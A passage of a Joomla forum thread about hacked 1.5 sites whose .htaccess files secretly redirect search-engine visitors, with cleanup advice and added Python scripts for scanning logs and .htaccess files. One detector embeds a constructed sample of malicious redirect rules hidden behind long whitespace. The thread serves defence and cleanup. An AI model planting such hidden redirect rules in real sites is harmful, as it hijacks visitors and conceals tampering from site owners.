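    # A browser arriving from a page sends a referer; a hand-driven shell does not.
    if reasons and rec["method"] == "POST" and rec["referer"] == "-":
        reasons.append("direct POST with no referer")
    return reasons


def scan_log(text):
    """Return {source_ip: [(path, status, reasons), ...]} for suspicious requests,
    grouped by client so a single operator address stands out."""
    hits = defaultdict(list)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = reasons_for(rec)
        if reasons:
            hits[rec["ip"]].append((rec["path"], int(rec["status"]), reasons))
    return dict(hits)


if __name__ == "__main__":
    for ip, reqs in scan_log(SAMPLE_LOG).items():
        for path, status, why in reqs:
            print(f"{ip} {status} {path}: {'; '.join(why)}")
```

Run against a real log, the timestamps of the first hit per path tell you when the file was dropped, which is the window to look at in FTP and control-panel logs.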

York-Besom
Joomla! Fledgling
Posts: 1
Joined: Mon Sep 10, 2012 2:55 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by York-Besom » Mon Sep 10, 2012 3:05 pm

I am having the same problem on 1.5.23, but now I cannot access the CP of my site; I can only access it via FTP.
I have tried replacing the individual .htaccess files (with an old safe version) but to no avail. My host suggested I wipe my site and load an old back-up.

"Restore your /home/mydomain/public_html/.htaccess file,
Set permissions to 444,
Set owner to root
Create an empty file in /home/mydomain/.htaccess, as this was also being created with the suspect code. Again this is owned by root with 444 permissions."

How do I set the permissions to 444?

Jowiko
Joomla! Fledgling
Posts: 1
Joined: Mon Sep 10, 2012 3:45 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by Jowiko » Mon Sep 10, 2012 3:56 pm

I had the same problem on a bunch of my 1.5 sites. I have no idea which vulnerability they used, but it must be a common/easy one to exploit, because a few weeks ago I did the same thing, but the code re-appeared after they hacked into it again. I even removed the extensions that I thought were causing the problem, to no avail. Since I found the scripts in the images folder, I then placed my own .htaccess file in all the images folders that prevents any scripts from running from those folders:

Code:

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi .html
Options -ExecCGI
That way when any php files or other files like it are run from those folders, a forbidden error results.

Note: If you do this, make sure you put it in folders that don't need .php files or other scripts to run, as it will produce the same error for those pages! Only image files will load from those folders.

euoceo
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 4:40 pm

It doesn't matter that you've replaced .htaccess; that's not a fix for the hack/problem. Once your website has been hacked, there could be trojans left in anything, giving the hacker/bot an easy in. As your host said, and in the instructions of that link I sent, you wipe out all the files in that directory (take a backup for images/etc) and then reupload a clean version of Joomla and all the modules/etc you use. Only then can you be sure that there's nothing hidden/left in an obscure file.

http://docs.joomla.org/Security_Checklist_7

Better yet, review them all: http://docs.joomla.org/Security
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by PhilD » Mon Sep 10, 2012 4:48 pm

"site redirects to other places."
Unless you did this on purpose then your htaccess (and site) has been hacked.

"Every time I delete the htaccess it comes back."
Some hosts may insert a blank or a basic htaccess file with one or two lines of code in the public_html directory (your web root directory). However, if the htaccess file causes redirects, then you are hacked.

"something keeps altering my htaccess file and redirecting my site."
You are hacked.

"There is an htaccess file outside of the web root (public_html) directory." There should be no htaccess file outside of the web root (public_html) directory. If there is, you have been hacked.

The htaccess hack works similarly to this:
The site is hacked with randomly named files placed in rather common places. Files can have legitimate-sounding names; they may even have legitimate comments at the top of the file. This is done to attempt to blend in or hide the files within the site. The file names mean nothing and are likely different for each site.

Code is added to your htaccess file that is not obvious at first look, as the added code is pushed to the far right, which is generally off screen but can be viewed by scrolling to the right in a text editor.

A copy of the altered htaccess file is placed outside of the public_html directory. The htaccess file within the public_html directory is compared to the copy every time a visitor visits the site. If the compare is different, the altered one outside the public_html directory is copied back to the public_html directory, replacing the one that is there. This is why the redirects reappear.

If your site's htaccess file has not been altered by any hack code being added, then you are likely suffering from a different type of hack.

Adding htaccess files and code to not run certain file extensions from the images directories and the like only masks the issue, and does not fix the issue. This procedure was common when sites needed relaxed permissions (777) to operate properly. This is not so common now.

Common master accounts
If you have multiple sites under one "master" account, then all (or most of) the sites may be hacked if one site is compromised.

If a site has been compromised, then it is likely that no matter what you do or what permissions you have, you are likely to continue to be hacked. You have to remove the hack and fix how they got in in the first place. The easiest and most effective way of doing this is to follow the checklist:
PhilD wrote:
Before you post your security/been hacked topic, it is suggested to do all of the following. Failure to follow the suggestions below may leave your site vulnerable to being hacked again in the future.


You must state what version of Joomla you were using when the site first became hacked. This can make a difference as to how we approach your individual situation.

[ ] Download and RUN the Forum Post Assistant (FPA). Instructions are available here and are also included in the download package. Post the generated results in your security/been hacked topic.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review the Vulnerable Extensions List to make sure any 3rd party extension versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7. Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, viruses, trojans, spyware, etc. Checklist 7 contains a list of recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file that will be placed back on the website (such as, but not limited to, images, pdf files, files for download, and other documents and files) is valid and is supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories. More detailed information can be found in the security Checklist 7 link below.

Note: The forum post tool will work with all versions of Joomla.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
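An added check script (not PhilD's or the Joomla project's code) that applies the two signs described above to an .htaccess file: rules hidden behind a long run of leading whitespace, and referer-triggered rewrites that redirect to another host. The sample file, the indent threshold and the redirect domain are constructed placeholders; the digest helper is there so you can record a clean file's hash and re-check it on a schedule, since the post explains that the planted copy restores itself.

```python
import hashlib
import re
from typing import List, Tuple

# Constructed sample .htaccess: a few legitimate lines followed by rules
# pushed off-screen with 60 tabs, as the post describes. The domain is a
# placeholder, not a real indicator.
HIDE = "\t" * 60
SAMPLE_HTACCESS = (
    "## Joomla .htaccess (constructed sample)\n"
    "Options +FollowSymLinks\n"
    "RewriteEngine On\n"
    "RewriteRule ^(.*)$ index.php [L]\n"
    + HIDE + "<IfModule mod_rewrite.c>\n"
    + HIDE + "RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo)\\.(.*)\n"
    + HIDE + "RewriteRule ^(.*)$ http://redirect-target.invalid/x?8 [R=301,L]\n"
    + HIDE + "</IfModule>\n"
)
CLEAN_HTACCESS = "\n".join(SAMPLE_HTACCESS.splitlines()[:4]) + "\n"

HIDDEN_INDENT = 20  # assumption: no sane config indents this far
SEARCH_ENGINE_REFERER = re.compile(
    r"RewriteCond\s+%\{HTTP_REFERER\}.*\b(google|yahoo|bing|ask)\b", re.I)
EXTERNAL_REDIRECT = re.compile(r"RewriteRule\s+\S+\s+https?://", re.I)


def find_suspicious_lines(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, reason, stripped line) for each suspicious line.
    A line can be reported more than once if it trips several checks."""
    findings = []
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        if len(raw) - len(raw.lstrip()) >= HIDDEN_INDENT:
            findings.append((n, "hidden by leading whitespace", line))
        if SEARCH_ENGINE_REFERER.search(line):
            findings.append((n, "referer check for search engines", line))
        if EXTERNAL_REDIRECT.search(line):
            findings.append((n, "redirect to external host", line))
    return findings


def digest(text: str) -> str:
    """SHA-256 of the file contents; store it for the clean file and compare
    from cron, so a restored malicious copy is noticed quickly."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    for n, why, line in find_suspicious_lines(SAMPLE_HTACCESS):
        print(f"line {n}: {why}: {line}")
```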

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Sun Sep 23, 2012 4:30 am

siongraham, philD, and others

My apologies for not getting back sooner but thanks. I found a backdoor after inspecting my logs. There was definitely unusual activity to that backdoor file and I took it out.

Just to be safe, I installed an unhacked backup, changed ALL passwords, then deleted and made new FTP accounts. I also installed a firewall on my sites.

This attack really bothers me because my passwords are hard as hell and contain numbers, upper/lowercase, and all sorts of symbols. I don't even keep the passwords on my computer.

In addition, I just want to mention that my extensions are updated, etc. I am using 1.5.26 and somehow the hacker was still able to install a backdoor in my Joomla images folder. Fortunately, it's fixed and everything is running smoothly.

euoceo
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Sun Sep 23, 2012 4:38 am

The complexity of passwords has no bearing when the hack is exploiting code that allows someone to gain access to the website as the owner of the site files. Passwords let you block common front-end tasks and your admin stuff, but the website still runs as the owner of the site, so an exploit that allows someone to gain access to write files to a directory bypasses all that. I've seen complete file-manager apps uploaded to hacked sites that allow someone to browse (and edit) the entire site like it was on their desktop!
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.


Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Sun Sep 23, 2012 5:20 am

euoceo,

Thank you for your post. It's posts like yours and others that make us learn all the time!

Take it easy.
